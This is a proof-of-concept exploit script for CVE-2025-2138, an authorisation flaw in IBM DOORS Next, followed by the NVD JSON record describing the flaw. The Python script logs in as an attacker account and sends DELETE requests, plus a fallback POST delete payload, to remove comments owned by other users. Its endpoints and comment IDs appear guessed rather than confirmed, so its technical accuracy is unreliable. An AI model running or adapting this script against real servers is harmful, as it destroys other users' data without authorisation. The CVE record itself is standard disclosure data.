CVE-2025-2138

# CVE-2025-2138 PoC - IBM DOORS Next Comment Deletion IDOR # This PoC demonstrates how an authenticated user can delete comments # belonging to other users by manipulating request parameters. import requests # Target DOORS Next server configuration TARGET_URL = "https://target-doors-next-server:9443/rm" USERNAME = "attacker_user" PASSWORD = "attacker_password" # Step 1: Authenticate to obtain a valid session session = requests.Session() login_url = f"{TARGET_URL}/auth/j_security_check" login_data = { "j_username": USERNAME, "j_password": PASSWORD } response = session.post(login_url, data=login_data, verify=False) if response.status_code != 200: print("[-] Authentication failed") exit(1) print("[+] Authentication successful") # Step 2: Enumerate comment IDs belonging to other users # Comments can be found by browsing artifacts or through the API # Example comment IDs that belong to other users target_comment_ids = [12345, 12346, 12347, 12348] # Step 3: Attempt to delete comments owned by other users # The server fails to verify ownership, relying on client-side checks delete_url_template = f"{TARGET_URL}/comment/{{comment_id}}" for comment_id in target_comment_ids: delete_url = delete_url_template.format(comment_id=comment_id) # Send DELETE request with the attacker's session # Server-side validation is missing, so the request succeeds headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } response = session.delete(delete_url, headers=headers, verify=False) if response.status_code in [200, 204]: print(f"[+] Successfully deleted comment ID: {comment_id}") else: print(f"[-] Failed to delete comment ID: {comment_id}, Status: {response.status_code}") print("[+] Exploit completed") # Alternative: Using PUT/POST with action parameter # Some versions may use POST with a delete action parameter delete_payload = { "action": "delete", "commentId": 12345, "artifactId": 67890 } response = session.post( f"{TARGET_URL}/comment/action", json=delete_payload, headers=headers, verify=False ) if response.status_code in [200, 204]: print("[+] Successfully deleted comment via POST action")

{"cve": {"id": "CVE-2025-2138", "sourceIdentifier": "[email protected]", "published": "2025-10-12T14:15:36.023", "lastModified": "2025-10-16T14:25:30.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Engineering Requirements Management Doors Next 7.0.2, 7.0.3, and 7.1 \n\ncould allow an authenticated user on the network to delete comments from other users due to client-side enforcement of server-side security."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-602"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "6702EFCC-2FC7-48F3-9356-40033D147332"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "0634040A-046B-4F1D-AD33-7095D68429C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:engineering_requirements_management_doors_next:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "E44B30C9-5962-4994-A810-B0E04561EDD3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247716", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}